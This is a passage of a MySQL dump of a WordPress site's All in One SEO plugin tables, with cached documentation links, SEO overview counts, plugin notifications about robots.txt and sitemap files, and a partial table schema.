Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-problems-with-sharing-content-on-twitter\\/\",\"categories\":[\"social-networks\",\"troubleshooting\",\"twitter-settings\"]},\"18861\":{\"title\":\"Troubleshooting Problems With Sharing Content on Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/troubleshooting-problems-with-sharing-content-on-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\",\"troubleshooting\"]},\"18862\":{\"title\":\"Getting Started With Pinterest Rich Pins\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-social-meta-for-pinterest-rich-pins\\/\",\"categories\":[\"pinterest-settings\",\"social-networks\"]},\"18863\":{\"title\":\"Setting the Content Publisher for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-publisher-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18865\":{\"title\":\"Submitting a Sitemap to Yandex\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-yandex\\/\",\"categories\":[\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18866\":{\"title\":\"Submitting a Sitemap to Bing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-bing\\/\",\"categories\":[\"bing-webmaster-tools\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18867\":{\"title\":\"Submitting a Sitemap to Google\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/submitting-a-sitemap-to-google\\/\",\"categories\":[\"google-news-sitemap\",\"google-search-console\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18868\":{\"title\":\"Including Date and Author Archives in Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/including-date-and-author-archives-in-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18869\":{\"title\":\"Choosing Which Content to Include in Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/choosing-which-content-to-include-in-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18870\":{\"title\":\"Choosing Which Content to Include in Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/choosing-which-content-to-include-in-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18871\":{\"title\":\"Using Sitemap Indexes and Pagination\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-sitemap-indexes-and-pagination\\/\",\"categories\":[\"video-sitemap\",\"xml-sitemap\"]},\"18872\":{\"title\":\"How to Disable Sitemaps in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-disable-sitemaps-in-all-in-one-seo\\/\",\"categories\":[\"google-news-sitemap\",\"rss-sitemap\",\"video-sitemap\",\"xml-sitemap\"]},\"18873\":{\"title\":\"Baidu Webmaster Tools Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/baidu-webmaster-tools-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18874\":{\"title\":\"Setting Twitter Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-twitter-social-meta-for-your-homepage\\/\",\"categories\":[\"home-page-settings\",\"social-networks\",\"twitter-settings\"]},\"18875\":{\"title\":\"Setting Facebook Social Meta for Your Homepage\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-facebook-social-meta-for-your-homepage\\/\",\"categories\":[\"facebook-settings\",\"home-page-settings\",\"social-networks\"]},\"18876\":{\"title\":\"Setting the Card Type for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-card-type-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18877\":{\"title\":\"Setting the Object Types for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-object-types-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18879\":{\"title\":\"Setting the Priority and Frequency for Content in the Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18880\":{\"title\":\"Setting the Priority and Frequency for Content in the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-priority-and-frequency-for-content-in-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18881\":{\"title\":\"How to Exclude Content from Your RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18882\":{\"title\":\"How to Exclude Content from Your Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18883\":{\"title\":\"How to Exclude Content from Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18884\":{\"title\":\"How to Exclude Content from Your XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-exclude-content-from-your-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18885\":{\"title\":\"Setting Article Tags for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-article-tags-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18886\":{\"title\":\"Setting the Content Author for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18887\":{\"title\":\"Setting the Content Author for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-author-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18888\":{\"title\":\"Setting the Content Publisher for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-content-publisher-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18889\":{\"title\":\"How to Create a Google News Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-google-news-sitemap\\/\",\"categories\":[\"google-news-sitemap\"]},\"18890\":{\"title\":\"Including Videos in Custom Fields in Your Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/including-videos-in-custom-fields-in-your-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18891\":{\"title\":\"What is a Dynamically Generated Sitemap and Why is it Better to Use?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-a-dynamically-generated-sitemap-and-why-is-it-better-to-use\\/\",\"categories\":[\"frequently-asked-questions\",\"video-sitemap\",\"xml-sitemap\"]},\"18892\":{\"title\":\"How to Create a Video Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-video-sitemap\\/\",\"categories\":[\"video-sitemap\"]},\"18893\":{\"title\":\"Adding Your Facebook Admin ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-admin-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18894\":{\"title\":\"Adding Your Facebook App ID\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-your-facebook-app-id\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18895\":{\"title\":\"Access Control Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/access-control-settings\\/\",\"categories\":[\"access-control-settings\"]},\"18896\":{\"title\":\"Advanced Settings for Google Analytics\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/advanced-settings-for-google-analytics\\/\",\"categories\":[\"google-analytics\"]},\"18897\":{\"title\":\"Miscellaneous Site Verification\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/miscellaneous-site-verification\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18898\":{\"title\":\"Displaying Your Social Media Profiles in Knowledge Panel\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-your-social-media-profiles-in-knowledge-panel\\/\",\"categories\":[\"schema-settings\",\"social-networks\"]},\"18899\":{\"title\":\"How to Create an RSS Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-an-rss-sitemap\\/\",\"categories\":[\"rss-sitemap\"]},\"18900\":{\"title\":\"Excluding Images from the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-images-from-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18901\":{\"title\":\"Adding non-WordPress Content to the XML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-non-wordpress-content-to-the-xml-sitemap\\/\",\"categories\":[\"xml-sitemap\"]},\"18903\":{\"title\":\"Setting a Default Image for Twitter\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-twitter\\/\",\"categories\":[\"social-networks\",\"twitter-settings\"]},\"18904\":{\"title\":\"Setting a Default Image for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-default-image-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"18905\":{\"title\":\"Setting a Title Separator\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-a-title-separator\\/\",\"categories\":[\"search-appearance\"]},\"18906\":{\"title\":\"How to Protect Your Content With RSS Content Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-protect-your-content-with-rss-content-settings\\/\",\"categories\":[\"rss-content-settings\"]},\"18907\":{\"title\":\"How to Connect Your Site with Google Tag Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-tag-manager\\/\",\"categories\":[\"google-analytics\"]},\"18908\":{\"title\":\"How to Connect Your Site with Google Analytics\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-connect-your-site-with-google-analytics\\/\",\"categories\":[\"google-analytics\"]},\"18909\":{\"title\":\"How to Verify Your Site with Pinterest\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-pinterest\\/\",\"categories\":[\"pinterest-settings\",\"social-networks\",\"webmaster-tools\",\"webmaster-verification\"]},\"18910\":{\"title\":\"How to Verify Your Site with Yandex Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-yandex-webmaster-tools\\/\",\"categories\":[\"webmaster-tools\",\"webmaster-verification\"]},\"18911\":{\"title\":\"How to Verify Your Site with Bing Webmaster Tools\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-bing-webmaster-tools\\/\",\"categories\":[\"bing-webmaster-tools\",\"webmaster-tools\",\"webmaster-verification\"]},\"18912\":{\"title\":\"How to Verify Your Site with Google Search Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-verify-your-site-with-google-search-console\\/\",\"categories\":[\"google-search-console\",\"webmaster-tools\",\"webmaster-verification\"]},\"18913\":{\"title\":\"Usage Tracking\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/usage-tracking\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18915\":{\"title\":\"How do I use All in One SEO in my language?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-all-in-one-seo-in-my-language\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18920\":{\"title\":\"NGINX rewrite rules for Robots.txt\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/nginx-rewrite-rules-for-robots-txt\\/\",\"categories\":[\"robots-txt\",\"tools\"]},\"18927\":{\"title\":\"Supported PHP Versions for All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/supported-php-version\\/\",\"categories\":[\"troubleshooting\"]},\"18929\":{\"title\":\"Using a different CDN for script enqueuing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-a-different-cdn-for-script-enqueuing\\/\",\"categories\":[\"troubleshooting\"]},\"18930\":{\"title\":\"How do I get Google to show sitelinks for my site?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-get-google-to-show-sitelinks-for-my-site\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18954\":{\"title\":\"How does the import process for SEO data work?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-does-the-import-process-for-seo-data-work\\/\",\"categories\":[\"frequently-asked-questions\",\"importer-exporter\",\"tools\"]},\"18960\":{\"title\":\"Robots.txt Editor for Multisite Networks\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/robots-txt-editor-for-multisite-networks\\/\",\"categories\":[\"multisite-networks\",\"robots-txt\"]},\"18961\":{\"title\":\"What are the minimum requirements for All in One SEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-are-the-minimum-requirements-for-all-in-one-seo-pack\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18964\":{\"title\":\"How do I use your API code examples?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-do-i-use-your-api-code-examples\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18969\":{\"title\":\"XML Parsing Error - This page contains the following errors\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/this-page-contains-the-following-errors\\/\",\"categories\":[\"google-news-sitemap\",\"troubleshooting\",\"video-sitemap\",\"xml-sitemap\"]},\"18972\":{\"title\":\"The File Editor or Robots.txt modules are missing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/the-file-editor-or-robots-txt-modules-are-missing\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18977\":{\"title\":\"Excluding the XML Sitemap from caching\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/excluding-the-xml-sitemap-from-caching\\/\",\"categories\":[\"xml-sitemap\"]},\"18982\":{\"title\":\"Why doesn\'t the title and description I set appear in search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/why-doesnt-the-title-and-description-i-set-appear-in-search-results\\/\",\"categories\":[\"frequently-asked-questions\",\"post-page-settings\"]},\"18983\":{\"title\":\"Can I remove the date from Google search results?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/can-i-remove-the-date-from-google-search-results\\/\",\"categories\":[\"frequently-asked-questions\"]},\"18985\":{\"title\":\"Setting up HTTPS SSL\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-up-https-ssl\\/\",\"categories\":[\"general-seo-topics\"]},\"18995\":{\"title\":\"How to Increase the WordPress PHP Memory Limit\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/increase-wordpress-php-memory-limit\\/\",\"categories\":[\"troubleshooting\"]},\"19002\":{\"title\":\"Checking Index Status in Google Search Results\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/checking-index-status-in-google-search-results\\/\",\"categories\":[\"general-seo-topics\"]},\"19006\":{\"title\":\"SEO Data Importer\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/seo-data-importer\\/\",\"categories\":[\"seo-data-importer\"]},\"19008\":{\"title\":\"How to troubleshoot issues with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-troubleshoot-issues-with-all-in-one-seo-pack\\/\",\"categories\":[\"troubleshooting\"]},\"19010\":{\"title\":\"Quality Guidelines for SEO Titles and Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/quality-guidelines-for-seo-titles-and-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19016\":{\"title\":\"Top Tips for Good On-Page SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/top-tips-for-good-on-page-seo\\/\",\"categories\":[\"general-seo-topics\"]},\"19017\":{\"title\":\"Meta Descriptions\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/meta-descriptions\\/\",\"categories\":[\"general-seo-topics\"]},\"19028\":{\"title\":\"What is SEO meta?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-seo-meta\\/\",\"categories\":[\"getting-started\"]},\"19029\":{\"title\":\"Social Meta Settings - Individual Page\\/Post Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/social-meta-settings-individual-pagepost-settings\\/\",\"categories\":[\"post-page-settings\",\"social-networks\"]},\"19030\":{\"title\":\"File Editor Module\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/file-editor-module\\/\",\"categories\":[\"file-editor\"]},\"19031\":{\"title\":\"Social Meta Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/social-meta-module\\/\",\"categories\":[\"social-networks\"]},\"19032\":{\"title\":\"Importer &amp; Exporter Module\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/importer-exporter-module\\/\",\"categories\":[\"importer-exporter\",\"tools\"]},\"19034\":{\"title\":\"Feature Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/feature-manager\\/\",\"categories\":[\"feature-manager\"]},\"19035\":{\"title\":\"Advanced Settings for All in One SEO Pack\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/all-in-one-seo-pack-advanced-settings\\/\",\"categories\":[\"advanced-settings\"]}}}\";','2023-08-20 02:11:53','2023-08-13 02:11:53','2023-08-13 02:11:53'),
(6,'wp_notices','a:0:{}','2023-08-14 02:25:11','2023-08-13 02:11:53','2023-08-13 02:25:11'),
(11,'post_overview_data','a:5:{s:5:\"total\";i:176;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:176;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(12,'page_overview_data','a:5:{s:5:\"total\";i:36;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:36;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(13,'seedprod_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(14,'give_forms_overview_data','a:5:{s:5:\"total\";i:1;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:1;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(15,'dt_portfolio_overview_data','a:5:{s:5:\"total\";i:33;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:33;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(16,'dt_team_overview_data','a:5:{s:5:\"total\";i:170;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:170;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(17,'dt_testimonials_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(18,'dt_slideshow_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(19,'dt_gallery_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2023-08-20 02:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39'),
(20,'rss_feed','a:4:{i:0;a:4:{s:3:\"url\";s:176:\"https://aioseo.com/how-to-submit-a-sitemap-to-google-wordpress-tutorial/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-submit-a-sitemap-to-google-wordpress-tutorial\";s:5:\"title\";s:54:\"How to Submit a Sitemap to Google (WordPress Tutorial)\";s:4:\"date\";s:15:\"August 10, 2023\";s:7:\"content\";s:131:\"Wondering how to submit a sitemap to Google? The process is easy and important.\n\n\n\nSitemaps can speed up the process of Google c...\";}i:1;a:4:{s:3:\"url\";s:146:\"https://aioseo.com/best-wordpress-product-review-plugins/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=best-wordpress-product-review-plugins\";s:5:\"title\";s:47:\"8 Best WordPress Product Review Plugins in 2023\";s:4:\"date\";s:14:\"August 8, 2023\";s:7:\"content\";s:131:\"Are you looking for the best WordPress product review plugins for your website?\n\n\n\nProduct reviews play a massive role in helpin...\";}i:2;a:4:{s:3:\"url\";s:170:\"https://aioseo.com/how-to-stop-content-decay-and-regain-lost-traffic/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-stop-content-decay-and-regain-lost-traffic\";s:5:\"title\";s:70:\"How to Stop Content Decay and Regain Lost Web Traffic (Easy SEO Guide)\";s:4:\"date\";s:14:\"August 7, 2023\";s:7:\"content\";s:131:\"What is content decay, and how can you stop it from negatively impacting your SEO and traffic?\n\n\n\nPublishing helpful content is ...\";}i:3;a:4:{s:3:\"url\";s:154:\"https://aioseo.com/how-to-create-an-rss-sitemap-in-wordpress/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-create-an-rss-sitemap-in-wordpress\";s:5:\"title\";s:41:\"How to Create an RSS Sitemap in WordPress\";s:4:\"date\";s:14:\"August 3, 2023\";s:7:\"content\";s:131:\"Looking for an easy way to create an RSS sitemap in WordPress?\n\n\n\nGoogle recommends using both an XML and RSS sitemap for optima...\";}}','2023-08-13 14:21:39','2023-08-13 02:21:39','2023-08-13 02:21:39');
/*!40000 ALTER TABLE `dnctiavkr_aioseo_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_aioseo_notifications`
--

DROP TABLE IF EXISTS `dnctiavkr_aioseo_notifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_aioseo_notifications` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(13) NOT NULL,
  `addon` varchar(64) DEFAULT NULL,
  `title` text NOT NULL,
  `content` longtext NOT NULL,
  `type` varchar(64) NOT NULL,
  `level` text NOT NULL,
  `notification_id` bigint(20) unsigned DEFAULT NULL,
  `notification_name` varchar(255) DEFAULT NULL,
  `start` datetime DEFAULT NULL,
  `end` datetime DEFAULT NULL,
  `button1_label` varchar(255) DEFAULT NULL,
  `button1_action` varchar(255) DEFAULT NULL,
  `button2_label` varchar(255) DEFAULT NULL,
  `button2_action` varchar(255) DEFAULT NULL,
  `dismissed` tinyint(1) NOT NULL DEFAULT 0,
  `new` tinyint(1) NOT NULL DEFAULT 1,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ndx_aioseo_notifications_slug` (`slug`),
  KEY `ndx_aioseo_notifications_dates` (`start`,`end`),
  KEY `ndx_aioseo_notifications_type` (`type`),
  KEY `ndx_aioseo_notifications_dismissed` (`dismissed`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_aioseo_notifications`
--

LOCK TABLES `dnctiavkr_aioseo_notifications` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_aioseo_notifications` DISABLE KEYS */;
INSERT INTO `dnctiavkr_aioseo_notifications` VALUES
(1,'64d83bb6de4c7',NULL,'NEW: Announcing the AIOSEO Analyzer Chrome extension!  🚀','Speed up content reviews and technical SEO checks. This new free tool is designed for you!\r\n<br><br>\r\nAIOSEO Analyzer gives you a big-picture view of your SEO, bringing problem areas into sharp focus. It works on both unpublished <em>and</em> published pages.\r\n<br><br>\r\nAnd it’s <strong>100% free!</strong> Download it today from the Chrome Web Store. And take it for a test drive!','success','[\"4-x\"]',809,NULL,'2023-07-28 18:10:46',NULL,'Learn More','https://aioseo.com/announcing-all-in-one-analyzer-by-aioseo/?utm_source=WordPress&utm_campaign=chrome-extension-v4&utm_medium=plugin-notification&utm_content=Learn%20More','Download','https://aioseo.com/announcing-all-in-one-analyzer-by-aioseo/?utm_source=WordPress&utm_campaign=chrome-extension-v4&utm_medium=plugin-notification&utm_content=Download',0,0,'2023-08-13 02:11:02','2023-08-13 02:11:02'),
(2,'64d83bb6e0386',NULL,'🔥 [New] Advanced SEO Tracking with SEO Revisions & Google Updates Integration','Track the changes you make to your content and see how it <strong>connects to changes in your search rankings</strong>.\r\n<br><br>\r\nPlus, see <strong>Google Updates on a timeline in Search Statistics</strong>, so you know how they impact your SEO.\r\n<br><br>\r\nWe’ve also added many more new features to version 4.4.0 of AIOSEO. <strong>Upgrade today!</strong>','success','[\"4-x\",\"lite\"]',801,NULL,'2023-07-28 18:10:46',NULL,'Learn More','https://aioseo.com/announcing-seo-revisions-and-google-updates-integration/?utm_source=WordPress&utm_campaign=seo-revisions-v4-lite&utm_medium=plugin-notification&utm_content=Learn%20More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=seo-revisions-v4-lite&utm_medium=plugin-notification&utm_content=Get%20AIOSEO%20Pro',0,0,'2023-08-13 02:11:02','2023-08-13 02:11:02'),
(3,'64d83bc598fcb',NULL,'Physical Robots.txt File Detected','AIOSEO has detected a physical robots.txt file in the root folder of your WordPress installation. We recommend removing this file as it could cause conflicts with WordPress\' dynamically generated one. AIOSEO can import this file and delete it, or you can simply delete it.','error','[\"all\"]',NULL,'robots-physical-file','2023-08-13 02:11:17',NULL,'Import and Delete','http://action#tools/import-robots-txt?redirect=aioseo-tools','Delete','http://action#tools/delete-robots-txt?redirect=aioseo-tools',0,0,'2023-08-13 02:11:17','2023-08-13 02:11:17'),
(4,'64d83bc7925fc',NULL,'Static sitemap files detected','AIOSEO has detected static sitemap files in the root folder of your WordPress installation.\n				As long as these files are present, AIOSEO is not able to dynamically generate your sitemap.','error','[\"all\"]',NULL,'sitemap-static-files','2023-08-13 02:11:19',NULL,'Delete Static Files','http://action#sitemap/delete-static-files',NULL,NULL,0,0,'2023-08-13 02:11:19','2023-08-13 02:11:19');
/*!40000 ALTER TABLE `dnctiavkr_aioseo_notifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_aioseo_posts`
--

DROP TABLE IF EXISTS `dnctiavkr_aioseo_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_aioseo_posts` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL,
  `title` text DEFAULT NULL,
  `description` text DEFAULT NULL,
  `keywords` mediumtext DEFAULT NULL,
  `keyphrases` longtext DEFAULT NULL,
  `page_analysis` longtext DEFAULT NULL,
  `primary_term` longtext DEFAULT NULL,
  `canonical_url` text DEFAULT NULL,
  `og_title` text DEFAULT NULL,
  `og_description` text DEFAULT NULL,
  `og_object_type` varchar(64) DEFAULT 'default',
  `og_image_type` varchar(64) DEFAULT 'default',
  `og_image_url` text DEFAULT NULL,
  `og_image_width` int(11) DEFAULT NULL,
  `og_image_height` int(11) DEFAULT NULL,
  `og_image_custom_url` text DEFAULT NULL,
  `og_image_custom_fields` text DEFAULT NULL,
  `og_video` varchar(255) DEFAULT NULL,
  `og_custom_url` text DEFAULT NULL,
  `og_article_section` text DEFAULT NULL,
  `og_article_tags` text DEFAULT NULL,
  `twitter_use_og` tinyint(1) DEFAULT 0,
  `twitter_card` varchar(64) DEFAULT 'default',
  `twitter_image_type` varchar(64) DEFAULT 'default',
  `twitter_image_url` text DEFAULT NULL,
  `twitter_image_custom_url` text DEFAULT NULL,
  `twitter_image_custom_fields` text DEFAULT NULL,
  `twitter_title` text DEFAULT NULL,
  `twitter_description` text DEFAULT NULL,
  `seo_score` int(11) NOT NULL DEFAULT 0,
  `schema` longtext DEFAULT NULL,
  `schema_type` varchar(20) DEFAULT 'default',
  `schema_type_options` longtext DEFAULT NULL,
  `pillar_content` tinyint(1) DEFAULT NULL,
  `robots_default` tinyint(1) NOT NULL DEFAULT 1,
  `robots_noindex` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noarchive` tinyint(1) NOT NULL DEFAULT 0,
  `robots_nosnippet` tinyint(1) NOT NULL DEFAULT 0,
  `robots_nofollow` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noimageindex` tinyint(1) NOT NULL DEFAULT 0,
  `robots_noodp` tinyint(1) NOT NULL DEFAULT 0,
  `robots_notranslate` tinyint(1) NOT NULL DEFAULT 0,
  `robots_max_snippet` int(11) DEFAULT NULL,
  `robots_max_videopreview` int(11) DEFAULT NULL,
  `robots_max_imagepreview` varchar(20) DEFAULT 'large',
  `images` longtext DEFAULT NULL,
  `image_scan_date` datetime DEFAULT NULL,
  `priority` float DEFAULT NULL,
  `frequency` tinytext DEFAULT NULL,
  `videos` longtext DEFAULT NULL,
  `video_thumbnail` text DEFAULT NULL,
  `video_scan_date` datetime DEFAULT NULL,
  `local_seo` longtext DEFAULT NULL,
  `limit_modified_date` tinyint(1) NOT NULL DEFAULT 0,
